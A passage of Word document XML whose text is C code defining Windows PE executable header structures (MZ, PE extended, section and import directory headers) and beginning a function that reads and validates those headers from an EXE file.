        </w:rPr>
        <w:br/>
        <w:t>  unsigned short majorSubsystemVersion;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short minorSubsystemVersion;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long reserved1;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfImage;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfHeaders;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long checksum;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short subsystem;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short DLLCharacteristics;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfStackReserve;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfStackCommit;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfHeapReserve;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfHeapCommit;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long loaderFlags;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long numberOfRVAAndSizes;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long exportTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long exportTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long importTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long importTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long resourceTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long resourceTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long exceptionTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long exceptionTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long certFilePointer;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long certTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long relocationTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long relocationTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long debugDataAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long debugDataSize;</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lastRenderedPageBreak/>
        <w:t>  unsigned long archDataAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long archDataSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long globalPtrAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long globalPtrSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long TLSTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long TLSTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long loadConfigTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long loadConfigTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long boundImportTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long boundImportTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long importAddressTableAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long importAddressTableSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long delayImportDescAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long delayImportDescSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long COMHeaderAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long COMHeaderSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long reserved2;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long reserved3;</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struct SectionHeader</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unsigned char sectionName[8];</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long virtualSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long virtualAddress;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long sizeOfRawData;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long pointerToRawData;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long pointerToRelocations;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long pointerToLineNumbers;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short numberOfRelocations;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short numberOfLineNumbers;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long characteristics;</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struct MZHeader</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unsigned short signature;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short partPag;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short pageCnt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short reloCnt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short hdrSize;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short minMem;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short maxMem;</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lastRenderedPageBreak/>
        <w:t>  unsigned short reloSS;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short exeSP;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short chksum;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short exeIP;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short reloCS;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short tablOff;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned short overlay;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned char reserved[32];</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  unsigned long offsetToPE;</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struct ImportDirEntry</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DWORD importLookupTable;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  DWORD timeDateStamp;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  DWORD fowarderChain;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  DWORD nameRVA;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  DWORD importAddressTable;</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This function reads the MZ, PE, PE extended and Section Headers from an EXE file.</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bool readPEInfo(FILE *fp, MZHeader *outMZ, PE_Header *outPE, PE_ExtHeader *outpeXH,</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>        SectionHeader **outSecHdr)</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fseek(fp, 0, SEEK_END);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  long fileSize = ftell(fp);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  fseek(fp, 0, SEEK_SET);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if(fileSize &lt; sizeof(MZHeader))</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printf("File size too small\n");    </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    return false;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lastRenderedPageBreak/>
        <w:br/>
        <w:t>  // read MZ Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  MZHeader mzH;</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  fread(&amp;mzH, sizeof(MZHeader), 1, fp);</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if(mzH.signature != 0x5a4d)    // MZ</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printf("File does not have MZ header\n");</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    return false;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//printf("Offset to PE Header = %X\n", mzH.offsetToPE);</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if((unsigned long)fileSize &lt; mzH.offsetToPE + sizeof(PE_Header))</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printf("File size too small\n");    </w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>    return false;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 read PE Header</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="宋体" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br/>
        <w:t>  fseek(fp, mzH.offsetToPE, SEEK_SET);</w:t>
      </w:r>
      <w:r w:rsidRPr="00042699">
        <w:rPr>
